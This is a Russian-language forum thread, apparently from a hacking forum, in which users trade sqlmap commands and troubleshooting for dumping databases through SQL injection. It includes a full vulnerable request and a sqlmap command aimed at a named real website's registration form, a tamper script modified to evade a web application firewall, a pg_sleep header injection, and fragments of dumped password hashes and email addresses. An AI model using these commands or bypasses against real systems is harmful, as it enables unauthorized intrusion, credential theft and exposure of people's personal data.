Вы можете полностью скопировать запрос в текстовый файл и в уязвимом параметре поставить знак * и потом уже стартовать скульмап: Code: sqlmap -r "zapros.txt" или же скопировать запрос и при старте указать тестируемый параметр/хедер (например User-Agent): Code: sqlmap -r "zapros.txt" -p "user-agent"
Добрый подскажите как вытянуть пароль в blob? Пробовал и hex и прочее никак не тянет(( Code: back-end DBMS: MySQL >= 5.0.0 banner: '5.7.21-20-beget-5.7.21-20-1-log' Вечно такой результат http://joxi.ru/ZrJVX1phw8dRor http://joxi.ru/KAgK8yWFEDPj0A
Приветствую! Проблема такая: при сливе обрезается хеш: Code: [04:41:49] [INFO] retrieved: 'test@mail.com','$2y$10$IN1YM1wQoCAAI... [04:41:51] [INFO] retrieved: 'test@mail.com','$2y$10$s7Y6jmxm0Lk5MYk6p727... [04:41:53] [INFO] retrieved: 'test@mail.net','$2y$10$zIlubVWzn/zVAbNef... [04:41:54] [INFO] retrieved: 'test@mail.com','$H\\2y$7KguiftaH$10\\ZByke... [04:41:56] [INFO] retrieved: 'test@mail.com','$2y$10$8ycUx4ZRAtEvOpHS... [04:41:58] [INFO] retrieved: 'test@mail.com','$2y$10$X2cd3HkmJs5f3DsUtzk... [04:42:00] [INFO] retrieved: 'test@mail.com','$2y$10$52HMKZS6r4HT... Как это побороть? Пробовал hex, no-cast
Спасибо,разобрался. Просто при сливе базы, данные сохраняются лишь в sqlite файл сессии. Если закрыть консоль, то дамп не сохраняется,нужно ждать пока он полностью не сольется. С помощью --stop 100, сдампил первые 100 строк и глянул, все хорошо)
Добрый день,подскажите пожалуйста как вставить вот такую пост ссылку в мап.Я так понимаю нужно прописать еще --data.спасибо http://prntscr.com/st216j Code: The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL] Discovered by SQL injection Attack Details arrow_drop_up POST (multipart) input REGISTER[EMAIL] was set to 1'" Error message found: You have an error in your SQL syntax Code: POST /cabinet/registration/?backurl=/cabinet/®ister=yes HTTP/1.1 Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b Referer: https://aachibilyaev.com/ Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUEST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITRIX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPIRE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversion_visit_day%22%5D%7D;catalogViewMode=list;_ym_debug=null;last_visit=1591170065298::1591180865298;top100_id=t1.6912325.390564327.1591180865288 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 1021 Host: aachibilyaev.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]" g00dPa$$w0rD ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="REGISTER[EMAIL]" 1'" ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="REGISTER[LOGIN]" 1 ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="REGISTER[NAME]" TWSfSopc ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="REGISTER[PASSWORD]" g00dPa$$w0rD ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]" 555-666-0606 ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="backurl" /cabinet/ ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="licenses_popup" Y ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="register_submit_button" reg ------------Q9OXvYdJGy9b Content-Disposition: form-data; name="register_submit_button1" register_submit_button1=Регистрация ------------Q9OXvYdJGy9b--
sqlmap.py --url "https://aachibilyaev.com/cabinet/registration/?register=yes" --data="backurl=/cabinet/login/®iste r_submit_button=reg®ISTER[NAME]=asdasd®ISTER=1*®ISTER[PERSONAL_PHONE]=+7 (123) 123-12-31®ISTER[PASSWORD]=1234567®ISTER[CONFIRM_PASSWORD]=1234567®I STER[LOGIN]=1&licenses_popup=Y®ister_submit_button1=Регистрация" --dbs --risk=3 --level=3 --dbms=mysql p.s там фильтрация
я бы взял как болванку тампер Spoiler: equaltolike.py Code: #!/usr/bin/env python """ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import os import re from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL)) def tamper(payload, **kwargs): """ Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases >>> tamper('SELECT * FROM users WHERE id=1') 'SELECT * FROM users WHERE id LIKE 1' """ retVal = payload if payload: retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal теперь в регулярке пишите Code: retVal = re.sub(r"\s*FROM\s*", " \'xz\'froM ", retVal, flags=re.IGNORECASE) и сохраняете под другим именем.
Всё просто, вот варианты: Code: B: Boolean-based blind E: Error-based U: Union query-based S: Stacked queries T: Time-based blind Q: Inline queries Использовать так: Code: --technique=BE А вообще эти моменты расписаны все в sqlmap wiki usage на github'e Там все ключи всё расписано PS: а как понять, так просто голова+руки К примеру что бы сэкономить время не хочешь проверять на Time-based blind, то --technique=BEUSQ или наоборот если слепая то --technique=T Надеюсь мысль понял) (PS сорри что квадратно объяснил, на англ проще)
кто сталкивался с таким? http://prntscr.com/svuovq уязвимость типа boolean-based blind открывается бд ,но не полностью ,открывает часть таблицы,а дальше вот это [14:29:22] [INFO] retrieving the length of query output [14:29:22] [INFO] retrieved: [14:29:26] [INFO] retrieved: [14:29:30] [INFO] retrieving the length of query output [14:29:30] [INFO] retrieved: [14:29:33] [INFO] retrieved: [14:29:36] [INFO] retrieving the length of query output [14:29:36] [INFO] retrieved: [14:29:40] [INFO] retrieved: [14:29:44] [INFO] retrieving the length of query output [14:29:44] [INFO] retrieved: [14:29:47] [INFO] retrieved: [14:29:50] [INFO] retrieving the length of query output [14:29:50] [INFO] retrieved: [14:29:53] [INFO] retrieved: [14:29:57] [INFO] retrieving the length of query output [14:29:57] [INFO] retrieved: [14:30:00] [INFO] retrieved: [14:30:04] [INFO] retrieving the length of query output [14:30:04] [INFO] retrieved: [14:30:07] [INFO] retrieved: [14:30:11] [INFO] retrieving the length of query output [14:30:11] [INFO] retrieved:
Уязвимость в заголовке Code: Origin: -1;select pg_sleep(0); -- Как правильно вставить в sqlmap? --headers="Origin:*" не прокатывает
подскажите сливает в таком формате ***te89@gmail.co.uk ***slav.stojanov@outlook.com ***eneellis73@gmail.com ***chan@yahoo.com из за чего так?